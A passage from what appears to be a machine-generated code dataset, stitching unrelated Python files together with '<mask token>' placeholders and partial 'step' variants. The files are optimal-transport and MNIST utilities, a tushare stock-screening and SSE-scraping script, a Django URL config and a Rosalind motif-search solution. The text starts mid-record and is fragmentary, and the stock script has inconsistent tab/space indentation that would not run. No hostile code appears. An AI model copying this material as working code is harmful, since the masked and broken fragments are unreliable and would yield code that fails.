measure_weights_i, M_i)\n T_sum = T_sum + weight_i * np.reshape(1.0 / b, (-1, 1)\n ) * np.matmul(T_i, measure_locations_i)\n displacement_square_norm = np.sum(np.square(T_sum - X))\n X = T_sum\n print('iteration %d, displacement_square_norm=%f\\n', iter_count,\n displacement_square_norm)\n iter_count += 1\n return X\n\n\n<mask token>\n\n\nclass ReshapeTransform:\n\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, data, target, transform=None):\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n if self.transform:\n data_idxed = self.transform(data_idxed)\n return [data_idxed, target_idxed]\n\n\n<mask token>\n\n\ndef get_gmm_param(trial, cond=-1):\n if cond > 0:\n MEAN, COV = select_mean_and_cov(trial, range_cond=cond)\n else:\n MEAN, COV = select_mean_and_cov(trial)\n INPUT_DIM = MEAN[0].shape[1]\n OUTPUT_DIM = INPUT_DIM\n NUM_DISTRIBUTION = len(MEAN)\n NUM_GMM_COMPONENT = []\n for i in range(NUM_DISTRIBUTION):\n NUM_GMM_COMPONENT.append(MEAN[i].shape[0])\n high_dim_flag = INPUT_DIM > 2\n return (MEAN, COV, INPUT_DIM, OUTPUT_DIM, NUM_DISTRIBUTION,\n NUM_GMM_COMPONENT, high_dim_flag)\n\n\n<mask token>\n\n\ndef average_nn(args, **kwargs):\n averaged_parameters = np.zeros([args.N_SAMPLES, args.INPUT_DIM])\n tmp_data = averaged_parameters\n n_samp_of_subset = int(args.N_SAMPLES / args.NUM_DISTRIBUTION)\n for i in range(args.NUM_DISTRIBUTION):\n model_param = io.load(args.get_nn(**kwargs) +\n f'/subset_{i + 1}_samples_{args.subset_samples}/trial_26/storing_models/nn_2layer_epoch200.pt'\n )\n assert args.N_SAMPLES == model_param['layer1.weight'].shape[0]\n tmp_data[:, :-1] = PTU.torch2numpy(model_param['layer1.weight'])\n tmp_data[:, -1] = PTU.torch2numpy(model_param['last_layer.weight'].\n squeeze())\n if i == args.NUM_DISTRIBUTION - 1:\n averaged_parameters[i * n_samp_of_subset:] = tmp_data[i *\n n_samp_of_subset:]\n else:\n averaged_parameters[i * n_samp_of_subset:(i + 1) * n_samp_of_subset\n ] = tmp_data[i * n_samp_of_subset:(i + 1) * n_samp_of_subset]\n return averaged_parameters\n\n\n<mask token>\n\n\ndef get_marginal_list(cfg, type_data='2block'):\n if type_data == '2block':\n marginal_data = g_data.marginal_data_blocks_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'circ_squa':\n marginal_data = g_data.marginal_data_circ_squ_3loop_ficnn(cfg)[:, :,\n :-1]\n elif type_data == 'mnist0-1':\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)\n elif type_data == '3digit':\n marginal_data = g_data.marginal_data_3digit_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'ellipse':\n marginal_data = g_data.marginal_data_ellipse_3loop_ficnn(cfg)[:, :, :-1\n ]\n elif type_data == 'line':\n marginal_data = g_data.marginal_data_line_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'usps_mnist':\n marginal_data = g_data.marginal_usps_3loop_ficnn_handle(cfg)[0][\n torch.randperm(5000), :, :-1]\n elif type_data == 'mnist_group':\n if cfg.N_TEST == 25:\n idx_digit = torch.zeros(25).long()\n for idx in range(5):\n idx_digit[idx * 5:(idx + 1) * 5] = 5000 * idx + torch.arange(5)\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)[\n idx_digit]\n else:\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)[torch\n .randperm(25000)]\n elif type_data == 'cifar':\n marginal_data = g_data.marginal_cifar_handle(cfg)\n elif type_data == 'gmm':\n marginal_data = g_data.marginal_data_gmm_3loop_ficnn(cfg)[:, :, :-1]\n return marginal_data.permute(2, 0, 1)\n",
"step-5": "from __future__ import print_function\nimport ot\nimport torch\nimport numpy as np\nfrom sklearn.neighbors import KernelDensity\nfrom torch.utils.data import Dataset\nimport jacinle.io as io\nimport optimal_transport_modules.pytorch_utils as PTU\nimport optimal_transport_modules.generate_data as g_data\nfrom optimal_transport_modules.record_mean_cov import select_mean_and_cov\n\n'''\nPyTorch type\n'''\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(\n kernel='gaussian', bandwidth=bandwidth).fit(miu)\n return kde_analyzer\n\n\ndef second_moment_no_average(batch_dim):\n return batch_dim.pow(2).sum(dim=1)\n\n\ndef second_moment_single_dist(batch_dim):\n return batch_dim.pow(2).sum(dim=1).mean()\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1),\n batch_dim_2.reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1),\n batch_dim_2.reshape(-1))\n return innner_product\n\n\ndef grad_of_function(input_samples, network):\n g_of_y = network(input_samples).sum()\n gradient = torch.autograd.grad(\n g_of_y, input_samples, create_graph=True)[0]\n return gradient\n\n\ndef two_loop_loss_in_W2(convex_f_list, grad_g_of_y, miu_i, dist_weight, idx_dist):\n n_dist = dist_weight.shape[0]\n\n #! The 2nd loss part useful for f/g parameters\n f_grad_g_y = convex_f_list[idx_dist](grad_g_of_y).mean()\n\n #! The 4th loss part useful for f/g parameters\n for j in range(n_dist):\n f_grad_g_y -= dist_weight[j] * convex_f_list[j](grad_g_of_y).mean()\n\n #! The 1st loss part useful for g parameters\n inner_product = inprod_average(grad_g_of_y, miu_i)\n\n #! The 3rd loss part useful for g parameters\n half_moment_grad_of_g = 0.5 * second_moment_single_dist(grad_g_of_y)\n\n loss_gi = (f_grad_g_y - inner_product +\n half_moment_grad_of_g) * dist_weight[idx_dist]\n return loss_gi\n\n\n'''\nlocalized POT library\n'''\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n # see here for details\n # https://pythonot.github.io/all.html#ot.emd\n # https://pythonot.github.io/all.html#ot.emd2\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M)**2, axis=2)\n return ot.emd2(a, b, M)\n\n\ndef free_support_barycenter(measures_locations, measures_weights, X_init, b=None, weights=None, numItermax=100, stopThr=1e-7, use_sinkhorn=False):\n g_sinkhorn_reg = 0.1\n iter_count = 0\n N = len(measures_locations)\n k = X_init.shape[0]\n d = X_init.shape[1]\n if b is None:\n b = np.ones((k,)) / k\n if weights is None:\n weights = np.ones((N,)) / N\n\n X = X_init\n\n log_dict = {}\n displacement_square_norm = stopThr + 1.\n while (displacement_square_norm > stopThr and iter_count < numItermax):\n T_sum = np.zeros((k, d))\n for (measure_locations_i, measure_weights_i, weight_i) in zip(measures_locations, measures_weights, weights.tolist()):\n M_i = ot.dist(X, measure_locations_i)\n if use_sinkhorn:\n T_i = ot.bregman.sinkhorn(\n b, measure_weights_i, M_i, g_sinkhorn_reg)\n else:\n T_i = ot.emd(b, measure_weights_i, M_i)\n T_sum = T_sum + weight_i * \\\n np.reshape(1. / b, (-1, 1)) * \\\n np.matmul(T_i, measure_locations_i)\n\n displacement_square_norm = np.sum(np.square(T_sum - X))\n\n X = T_sum\n print('iteration %d, displacement_square_norm=%f\\n',\n iter_count, displacement_square_norm)\n\n iter_count += 1\n\n return X\n\n\n'''\nMNIST utils\n'''\n\n\nclass ReshapeTransform:\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\n# def extract_three_number(total_data):\n# idx_train = (total_data.targets == 0) + (total_data.targets ==\n# 1) + (total_data.targets == 7)\n# total_data.targets = total_data.targets[idx_train]\n# total_data.data = total_data.data[idx_train]\n# return total_data\n\n\nclass CustomMnistDataset(Dataset):\n def __init__(self, data, target, transform=None):\n\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n # sample = {'data': data_idxed, 'target': target_idxed}\n\n if self.transform:\n data_idxed = self.transform(data_idxed)\n\n return [data_idxed, target_idxed]\n\n\n'''\nGaussian utils\n'''\n\n\ndef get_gmm_param(trial, cond=-1):\n if cond > 0:\n MEAN, COV = select_mean_and_cov(trial, range_cond=cond)\n else:\n MEAN, COV = select_mean_and_cov(trial)\n INPUT_DIM = MEAN[0].shape[1]\n OUTPUT_DIM = INPUT_DIM\n NUM_DISTRIBUTION = len(MEAN)\n NUM_GMM_COMPONENT = []\n for i in range(NUM_DISTRIBUTION):\n NUM_GMM_COMPONENT.append(MEAN[i].shape[0])\n high_dim_flag = INPUT_DIM > 2\n return MEAN, COV, INPUT_DIM, OUTPUT_DIM, NUM_DISTRIBUTION, NUM_GMM_COMPONENT, high_dim_flag\n\n\n'''\nAverage the 2 layer neural networks\n'''\n\n\ndef average_nn(args, **kwargs):\n averaged_parameters = np.zeros([args.N_SAMPLES, args.INPUT_DIM])\n tmp_data = averaged_parameters\n n_samp_of_subset = int(args.N_SAMPLES / args.NUM_DISTRIBUTION)\n for i in range(args.NUM_DISTRIBUTION):\n model_param = io.load(args.get_nn(**kwargs) +\n f\"/subset_{i+1}_samples_{args.subset_samples}/trial_26/storing_models/nn_2layer_epoch200.pt\")\n\n assert args.N_SAMPLES == model_param['layer1.weight'].shape[0]\n tmp_data[:, :-1] = PTU.torch2numpy(model_param['layer1.weight'])\n tmp_data[:, -\n 1] = PTU.torch2numpy(model_param['last_layer.weight'].squeeze())\n if i == args.NUM_DISTRIBUTION - 1:\n averaged_parameters[(i * n_samp_of_subset)\n :] = tmp_data[(i * n_samp_of_subset):]\n else:\n averaged_parameters[i * n_samp_of_subset:\n (i + 1) * n_samp_of_subset] = tmp_data[i * n_samp_of_subset:\n (i + 1) * n_samp_of_subset]\n\n return averaged_parameters\n\n\n'''\nget marginal data handle\n'''\n\n\ndef get_marginal_list(cfg, type_data='2block'):\n if type_data == '2block':\n marginal_data = g_data.marginal_data_blocks_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'circ_squa':\n marginal_data = g_data.marginal_data_circ_squ_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'mnist0-1':\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(\n cfg)\n elif type_data == '3digit':\n marginal_data = g_data.marginal_data_3digit_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'ellipse':\n marginal_data = g_data.marginal_data_ellipse_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'line':\n marginal_data = g_data.marginal_data_line_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'usps_mnist':\n marginal_data = g_data.marginal_usps_3loop_ficnn_handle(\n cfg)[0][torch.randperm(5000), :, :-1]\n elif type_data == 'mnist_group':\n if cfg.N_TEST == 25:\n idx_digit = torch.zeros(25).long()\n for idx in range(5):\n idx_digit[idx * 5:(idx + 1) * 5] = 5000 * idx + torch.arange(5)\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(\n cfg)[idx_digit]\n else:\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(\n cfg)[torch.randperm(25000)]\n elif type_data == 'cifar':\n marginal_data = g_data.marginal_cifar_handle(cfg)\n elif type_data == 'gmm':\n marginal_data = g_data.marginal_data_gmm_3loop_ficnn(\n cfg)[:, :, :-1]\n return marginal_data.permute(2, 0, 1)\n",
"step-ids": [
12,
13,
17,
21,
22
]
}
|
[
12,
13,
17,
21,
22
] |
# -*- coding:utf-8 -*
import tushare as ts
import numpy as np
import pandas as pd
import datetime
import chardet
import urllib
import urllib2
import re
from bs4 import BeautifulSoup
import time
from pandas import Series,DataFrame
def get_relation(stock1,stock2):
hist_data = ts.get_hist_data(stock1,start='2018-05-01')
if hist_data is None:
return 0
hist_data.sort_values(by = "date",ascending = True,inplace = True)
hist_data_second = ts.get_hist_data(stock2,start='2018-05-01')
if hist_data_second is None:
return 0
hist_data_second.sort_values(by = "date",ascending = True,inplace = True)
result = pd.concat([hist_data,hist_data_second],axis = 1)
result = result['close']
result = result.dropna(how = 'any')
#result.to_excel('result.xlsx')
corr_result= result.corr()
result=np.array(corr_result.iloc[1:3,0:1])
return result[0][0]
year = datetime.datetime.now().strftime('%Y')
month = datetime.datetime.now().strftime('%m')
day = datetime.datetime.now().strftime('%d')
second = datetime.datetime.now().strftime('%s')
season = int(month) /3 +1
basic = ts.get_stock_basics()
basic.to_excel( year+month+day+second + '_basics.xlsx')
grouped_pe = basic['pe'].groupby(basic['industry'])
grouped_pe.mean().to_excel( year+month+day+second + '_grouped_pe.xlsx')
grouped_pb = basic['pb'].groupby(basic['industry'])
#print grouped.mean()
grouped_pb.mean().to_excel( year+month+day+second + '_grouped_pb.xlsx')
#np_industry = np.array(grouped_pb.mean().index)
grouped_industry=pd.concat([grouped_pe.mean(),grouped_pb.mean()],axis =1 ,join = 'inner')
grouped_industry.to_excel( year+month+day+second + '_grouped_industry.xlsx')
np_industry = np.array(grouped_pb.mean().index)
#for industry in np_industry:
# current_industy = basic[basic['industry'].isin([str(industry)])]
# current_industy.to_excel(str(industry)+ '.xlsx')
yj_current_season=ts.forecast_data(int(year),season)
yj_last_season=ts.forecast_data(int(year),season-1)
yj_last_season_index=yj_last_season.set_index('code')
yj_curren_seaon_index=yj_current_season.set_index('code')
yj_index=pd.concat([yj_curren_seaon_index,yj_last_season_index],axis =0 ,join = 'outer')
#yj_index.to_excel('index_yeji.xlsx')
result = pd.concat([yj_index,basic],axis =1 ,join = 'inner')
#result_select = result[result['type'].isin([u'\u9884\u5347',u'\u9884\u589e'])]
result_select = result[result['type'].isin([u'\u9884\u589e'])]
result_select.sort_values(by = "report_date",ascending = False,inplace = True)
result_select = result_select[result_select['report_date'].isin([np.array(result_select['report_date'])[0]])]
for code in np.array(result_select.index):
result_select.ix[str(code),'mean-pe'] = grouped_pe.mean()[result_select.ix[str(code),'industry']]
hist_data = ts.get_hist_data(str(code),start='2018-05-01')
if hist_data is not None:
hist_data.sort_values(by = "date",ascending = False,inplace = True)
hist_data = hist_data.iloc[0:5,:]
#five_day_everage = hist_data['close'].mean()
#hist_data.to_excel( year+month+day+second+str(code) + 'history.xlsx')
result_select.ix[str(code),'five-day-mean'] = hist_data['close'].mean()
close_price = np.array(hist_data['close'])
if close_price.size > 0:
result_select.ix[str(code),'last_day_price'] = np.array(hist_data['close'])[0]
result_select.ix[str(code),'increase-rate'] = \
(np.array(hist_data['close'])[0] - hist_data['close'].mean())/hist_data['close'].mean()
result_select.ix[str(code),'touzhijiazhi'] = \
(result_select.ix[str(code),'totalAssets']*10000)/(result_select.ix[str(code),'totals']*10000*10000)
result_select.ix[str(code),'price-values'] = \
result_select.ix[str(code),'touzhijiazhi'] /result_select.ix[str(code),'last_day_price']
if result_select.ix[str(code),'pe'] == 0:
result_select.ix[str(code),'pe'] = result_select.ix[str(code),'mean-pe']
result_select.ix[str(code),'pray-values'] = \
result_select.ix[str(code),'price-values'] * result_select.ix[str(code),'npr']/100.0 \
*result_select.ix[str(code),'mean-pe'] /result_select.ix[str(code),'pe'] \
*hist_data['close'].mean()/result_select.ix[str(code),'last_day_price']
result_select.to_excel( year+month+day+second + '_yeji.xlsx')
i = datetime.datetime.now()
#print ("当前的日期是%s" %i)
time_string = "%s-%s-%s"%(i.year,i.month,i.day)
print time_string
url ='http://query.sse.com.cn/infodisplay/queryBltnBookInfo.do?jsonCallBack=jsonpCallback55433&isNew=1&publishYear=2018'
#url ='https://query.sse.com.cn/infodisplay/'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
'Host':'query.sse.com.cn',
'Referer':'http://www.sse.com.cn/disclosure/listedinfo/periodic/',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN',
'Connection': 'keep-alive'
}
#values = {'inputCode':'000063'}
#pos_data = urllib.urlencode(values)
def compare_time(time1,time2):
s_time = time.mktime(time.strptime(time1,'%Y-%m-%d'))
e_time = time.mktime(time.strptime(time2,'%Y-%m-%d'))
return int(s_time) - int(e_time)
def my_save(filename,contents):
fh=open(filename,'w')
fh.write(contents)
fh.close()
request = urllib2.Request(url,headers = headers)
page = urllib2.urlopen(request)
#page.encoding = 'utf-8'
soup = BeautifulSoup(page,"lxml")
html = soup.select('p')
string1 = str(html[0])
string2 = string1.split('ROWNUM_')
df=pd.DataFrame(columns=['Name','code','type','publishDate0','actualDate'])
for string in string2:
name= re.findall(r'companyAbbr":"(.+?)","',string)
code= re.findall(r'companyCode":"(.+?)","',string)
report_type= re.findall(r'bulletinType":"(.+?)","',string)
date = re.findall(r'publishDate0":"(.+?)","',string)
actual = re.findall(r'actualDate":"(.+?)","',string)
if len(actual) == 0 and len(date)!=0 and compare_time(str(date[0]),time_string) > 0:
df=df.append(pd.DataFrame({'Name':name,'code':code,'type':report_type,'publishDate0':date}),ignore_index=True)
df.sort_values(by = "publishDate0",ascending = True,inplace = True)
#df= df.iloc[0:16,:]
df.to_excel('ready_to_report.xlsx')
np_ready_report = np.unique(np.array(df['code']))
np_increase_report = np.array(result_select.index)
forcast=pd.DataFrame()
#forcast=pd.DataFrame(columns=['increase code','forcast code','relation'])
index =0;
for code1 in np_increase_report:
for code2 in np_ready_report:
if cmp(basic.ix[str(code2),'industry'],basic.ix[str(code1),'industry']) == 0:
relation = get_relation(str(code1),str(code2))
forcast.ix[str(index),'increase code'] = code1
forcast.ix[str(index),'forcast code'] = code2
forcast.ix[str(index),'relation'] = relation
forcast.ix[str(index),'publishDate0'] = np.array(df[df['code'].isin([code2])]['publishDate0'])[0]
forcast.ix[str(index),'forcast industry'] = basic.ix[str(code2),'industry']
forcast.ix[str(index),'increase industry'] = basic.ix[str(code1),'industry']
index = index +1
forcast.to_excel('forcast.xlsx')
|
normal
|
{
"blob_id": "00f2aafe1a0c66d0414d189b9fa3bbc2da9fd727",
"index": 2066,
"step-1": "# -*- coding:utf-8 -*\nimport tushare as ts\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport chardet\nimport urllib\nimport urllib2\nimport re\nfrom bs4 import BeautifulSoup\nimport time\nfrom pandas import Series,DataFrame\n\ndef get_relation(stock1,stock2):\n hist_data = ts.get_hist_data(stock1,start='2018-05-01')\n if hist_data is None:\n return 0\n hist_data.sort_values(by = \"date\",ascending = True,inplace = True)\n hist_data_second = ts.get_hist_data(stock2,start='2018-05-01')\n if hist_data_second is None:\n return 0\n hist_data_second.sort_values(by = \"date\",ascending = True,inplace = True)\n result = pd.concat([hist_data,hist_data_second],axis = 1)\n result = result['close']\n result = result.dropna(how = 'any')\n #result.to_excel('result.xlsx')\n corr_result= result.corr()\n result=np.array(corr_result.iloc[1:3,0:1])\n return result[0][0]\n\nyear = datetime.datetime.now().strftime('%Y')\nmonth = datetime.datetime.now().strftime('%m')\nday = datetime.datetime.now().strftime('%d')\nsecond = datetime.datetime.now().strftime('%s')\nseason = int(month) /3 +1\nbasic = ts.get_stock_basics()\nbasic.to_excel( year+month+day+second + '_basics.xlsx')\n\ngrouped_pe = basic['pe'].groupby(basic['industry'])\n\ngrouped_pe.mean().to_excel( year+month+day+second + '_grouped_pe.xlsx')\n\ngrouped_pb = basic['pb'].groupby(basic['industry'])\n#print grouped.mean()\ngrouped_pb.mean().to_excel( year+month+day+second + '_grouped_pb.xlsx')\n\n#np_industry = np.array(grouped_pb.mean().index)\ngrouped_industry=pd.concat([grouped_pe.mean(),grouped_pb.mean()],axis =1 ,join = 'inner')\ngrouped_industry.to_excel( year+month+day+second + '_grouped_industry.xlsx')\nnp_industry = np.array(grouped_pb.mean().index)\n#for industry in np_industry:\n# current_industy = basic[basic['industry'].isin([str(industry)])]\n# current_industy.to_excel(str(industry)+ '.xlsx')\n\nyj_current_season=ts.forecast_data(int(year),season)\nyj_last_season=ts.forecast_data(int(year),season-1)\n\nyj_last_season_index=yj_last_season.set_index('code')\nyj_curren_seaon_index=yj_current_season.set_index('code')\nyj_index=pd.concat([yj_curren_seaon_index,yj_last_season_index],axis =0 ,join = 'outer')\n#yj_index.to_excel('index_yeji.xlsx')\nresult = pd.concat([yj_index,basic],axis =1 ,join = 'inner')\n#result_select = result[result['type'].isin([u'\\u9884\\u5347',u'\\u9884\\u589e'])]\nresult_select = result[result['type'].isin([u'\\u9884\\u589e'])]\nresult_select.sort_values(by = \"report_date\",ascending = False,inplace = True)\nresult_select = result_select[result_select['report_date'].isin([np.array(result_select['report_date'])[0]])]\n\nfor code in np.array(result_select.index):\n\tresult_select.ix[str(code),'mean-pe'] = grouped_pe.mean()[result_select.ix[str(code),'industry']] \n\thist_data = ts.get_hist_data(str(code),start='2018-05-01')\n\tif hist_data is not None:\n \t\thist_data.sort_values(by = \"date\",ascending = False,inplace = True)\n \t\thist_data = hist_data.iloc[0:5,:]\n \t\t#five_day_everage = hist_data['close'].mean()\n \t\t#hist_data.to_excel( year+month+day+second+str(code) + 'history.xlsx')\n\t\t\tresult_select.ix[str(code),'five-day-mean'] = hist_data['close'].mean()\n close_price = np.array(hist_data['close'])\n if close_price.size > 0:\n \t\t\tresult_select.ix[str(code),'last_day_price'] = np.array(hist_data['close'])[0]\n result_select.ix[str(code),'increase-rate'] = \\\n (np.array(hist_data['close'])[0] - hist_data['close'].mean())/hist_data['close'].mean()\n \n result_select.ix[str(code),'touzhijiazhi'] = \\\n (result_select.ix[str(code),'totalAssets']*10000)/(result_select.ix[str(code),'totals']*10000*10000) \n\n result_select.ix[str(code),'price-values'] = \\\n result_select.ix[str(code),'touzhijiazhi'] /result_select.ix[str(code),'last_day_price']\n if result_select.ix[str(code),'pe'] == 0:\n result_select.ix[str(code),'pe'] = result_select.ix[str(code),'mean-pe']\n result_select.ix[str(code),'pray-values'] = \\\n result_select.ix[str(code),'price-values'] * result_select.ix[str(code),'npr']/100.0 \\\n *result_select.ix[str(code),'mean-pe'] /result_select.ix[str(code),'pe'] \\\n *hist_data['close'].mean()/result_select.ix[str(code),'last_day_price']\n\n \nresult_select.to_excel( year+month+day+second + '_yeji.xlsx')\n\ni = datetime.datetime.now()\n#print (\"当前的日期是%s\" %i)\ntime_string = \"%s-%s-%s\"%(i.year,i.month,i.day)\nprint time_string\nurl ='http://query.sse.com.cn/infodisplay/queryBltnBookInfo.do?jsonCallBack=jsonpCallback55433&isNew=1&publishYear=2018'\n#url ='https://query.sse.com.cn/infodisplay/'\n\nheaders = {\n'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n'Host':'query.sse.com.cn',\n'Referer':'http://www.sse.com.cn/disclosure/listedinfo/periodic/',\n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n'Accept-Encoding': 'gzip, deflate',\n'Accept-Language': 'zh-CN',\n'Connection': 'keep-alive'\n}\n#values = {'inputCode':'000063'}\n#pos_data = urllib.urlencode(values)\ndef compare_time(time1,time2):\n s_time = time.mktime(time.strptime(time1,'%Y-%m-%d'))\n e_time = time.mktime(time.strptime(time2,'%Y-%m-%d'))\n return int(s_time) - int(e_time)\n\ndef my_save(filename,contents):\n fh=open(filename,'w')\n fh.write(contents)\n fh.close()\n\n\nrequest = urllib2.Request(url,headers = headers)\npage = urllib2.urlopen(request)\n#page.encoding = 'utf-8'\nsoup = BeautifulSoup(page,\"lxml\")\nhtml = soup.select('p')\nstring1 = str(html[0])\nstring2 = string1.split('ROWNUM_')\ndf=pd.DataFrame(columns=['Name','code','type','publishDate0','actualDate'])\nfor string in string2:\n name= re.findall(r'companyAbbr\":\"(.+?)\",\"',string)\n code= re.findall(r'companyCode\":\"(.+?)\",\"',string)\n report_type= re.findall(r'bulletinType\":\"(.+?)\",\"',string)\n date = re.findall(r'publishDate0\":\"(.+?)\",\"',string)\n\n actual = re.findall(r'actualDate\":\"(.+?)\",\"',string)\n if len(actual) == 0 and len(date)!=0 and compare_time(str(date[0]),time_string) > 0:\n df=df.append(pd.DataFrame({'Name':name,'code':code,'type':report_type,'publishDate0':date}),ignore_index=True)\ndf.sort_values(by = \"publishDate0\",ascending = True,inplace = True)\n#df= df.iloc[0:16,:]\ndf.to_excel('ready_to_report.xlsx')\n\n\nnp_ready_report = np.unique(np.array(df['code']))\n\n\nnp_increase_report = np.array(result_select.index)\nforcast=pd.DataFrame()\n#forcast=pd.DataFrame(columns=['increase code','forcast code','relation'])\nindex =0;\nfor code1 in np_increase_report:\n for code2 in np_ready_report:\n if cmp(basic.ix[str(code2),'industry'],basic.ix[str(code1),'industry']) == 0:\n \trelation = get_relation(str(code1),str(code2))\n \tforcast.ix[str(index),'increase code'] = code1\n \tforcast.ix[str(index),'forcast code'] = code2\n \tforcast.ix[str(index),'relation'] = relation\n \tforcast.ix[str(index),'publishDate0'] = np.array(df[df['code'].isin([code2])]['publishDate0'])[0]\n \tforcast.ix[str(index),'forcast industry'] = basic.ix[str(code2),'industry']\n \tforcast.ix[str(index),'increase industry'] = basic.ix[str(code1),'industry']\n\t\tindex = index +1\n\nforcast.to_excel('forcast.xlsx')\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name ='park-home'),
path('login/', views.login, name ='park-login'),
]
|
normal
|
{
"blob_id": "2fd490ca54f5d038997cec59a3e07c3f2c2d2538",
"index": 6757,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', views.home, name='park-home'), path('login/', views\n .login, name='park-login')]\n",
"step-3": "from django.urls import path\nfrom . import views\nurlpatterns = [path('', views.home, name='park-home'), path('login/', views\n .login, name='park-login')]\n",
"step-4": "from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.home, name ='park-home'), \n path('login/', views.login, name ='park-login'), \n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Implement GreedyMotifSearch
http://rosalind.info/problems/ba2d/
Given: Integers k and t, followed by a collection of strings Dna.
Return: A collection of strings BestMotifs resulting from running GreedyMotifSearch(Dna, k, t). If at any step you find more than one Profile-most probable k-mer in a given string, use the one occurring first.
'''
import pandas as pd
from ba1g import hamming_distance
from ba2c import profile_most_probable
filename = 'rosalind_ba2d.txt'
BASES = ['A', 'C', 'G', 'T']
def greedy_motif_search(dnas, k, t):
# took ~4 min to run on test dataset but seems to be the correct algorithm
# based on pseudocode (and other peoples' submissions)
best_motifs = [dna[:k] for dna in dnas]
best_score = score_motifs(best_motifs)
for i in range(len(dnas[0]) - k + 1):
print(i)
motifs = [dnas[0][i:i+k]]
for j in range(1, t):
motifs.append(profile_most_probable(dnas[j], k, form_profile(motifs)))
score = score_motifs(motifs)
if score < best_score:
best_motifs = motifs
best_score = score
return best_motifs
def form_profile(motifs):
profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)
for motif in motifs:
for i, base in enumerate(motif):
profile.loc[base, i] += 1
return profile / len(motifs)
def score_motifs(motifs):
# couldn't figure out what 'score' from pseudocode meant :(
# had to reference someone else's code:
# https://github.com/NathanielLovin/Rosalind/blob/master/BA2D.py
profile = form_profile(motifs)
# neat df function generates the consensus string
consensus = ''.join(profile.idxmax())
return sum(hamming_distance(motif, consensus) for motif in motifs)
def main():
with open(filename) as f:
k, t = list(map(int, f.readline().strip().split()))
dnas = [line.strip() for line in f.readlines()]
for motif in greedy_motif_search(dnas, k, t):
print(motif)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "ed7fa6e6f30eb06400cb38128617967a597f6c04",
"index": 2450,
"step-1": "<mask token>\n\n\ndef greedy_motif_search(dnas, k, t):\n best_motifs = [dna[:k] for dna in dnas]\n best_score = score_motifs(best_motifs)\n for i in range(len(dnas[0]) - k + 1):\n print(i)\n motifs = [dnas[0][i:i + k]]\n for j in range(1, t):\n motifs.append(profile_most_probable(dnas[j], k, form_profile(\n motifs)))\n score = score_motifs(motifs)\n if score < best_score:\n best_motifs = motifs\n best_score = score\n return best_motifs\n\n\ndef form_profile(motifs):\n profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n for motif in motifs:\n for i, base in enumerate(motif):\n profile.loc[base, i] += 1\n return profile / len(motifs)\n\n\ndef score_motifs(motifs):\n profile = form_profile(motifs)\n consensus = ''.join(profile.idxmax())\n return sum(hamming_distance(motif, consensus) for motif in motifs)\n\n\n<mask token>\n",
